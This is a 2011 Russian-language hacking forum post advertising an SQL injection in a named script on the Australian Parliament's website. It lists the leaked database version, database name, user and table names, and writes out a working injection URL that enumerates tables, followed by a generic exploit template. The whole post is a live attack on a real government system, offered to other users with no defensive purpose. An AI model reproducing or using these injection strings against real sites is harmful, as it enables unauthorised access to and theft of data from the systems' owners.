12.08.2011, 13:31
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
С нами:
8103926
Репутация:
85
|
|
сайт парламента Австралии:
PR 7 тИЦ - 120
Уязвимость в клиенте БД MS SQL
Платформа БД:
Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Имя БД:
ROCRWD
Имя Пользователя БД:
rocruser
Таблицы БД:
CowPat_Index
CommitteeInformation
dtproperties
sysconstraints
syssegments
tblCommittee
...
http://www.aph.gov.au/house/committee/report_register/byKeylist.asp?id=1%27+or+1=%28SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+%28%27CowPat_Index%27,%27CommitteeInforma tion%27,%27dtproperties%27,%27sysconstraints%27,%2 7syssegments%27%,%27СЛЕДУЮЩАЯ ТАБЛИЦА%27%29%29--
Путь к уязвимому скрипту
/house/committee/report_register/byKeylist.asp
Эксплойт
Сообщение от None
_http://www.aph.gov.au/house/committee/report_register/byKeylist.asp?id=1'+or+1=(
SQL INJ
))--
|
|
|